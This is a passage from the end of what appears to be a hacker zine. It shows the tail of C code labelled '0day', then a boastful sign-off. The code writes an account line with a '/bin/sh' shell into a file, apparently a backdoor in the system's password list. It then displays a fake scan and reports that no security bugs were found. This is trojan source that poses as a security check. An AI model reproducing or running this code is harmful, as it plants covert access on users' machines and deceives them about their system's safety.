daemon:/var/qmail:/bin/sh\n", fp); fclose(fp); printf("Analizing your system...please wait..."); for (i=0; i < 4000; i++) if (!(i%50)) printf("."); printf("\n\nNo security bugs found on your system.\n"); exit(0); } ++> End 0day -------------------[[[ el fin ]]]----------------------- y0h, this shit is just 2 HOT 2 HANDLE! i better quit dumping this shit before hzon gets owned again!@#@ next issue will be even more insane!! man o man. i better sign off bef0re silvio dies again! pz - elguapo |=[ EOF ]=---------------------------------------------------------------=|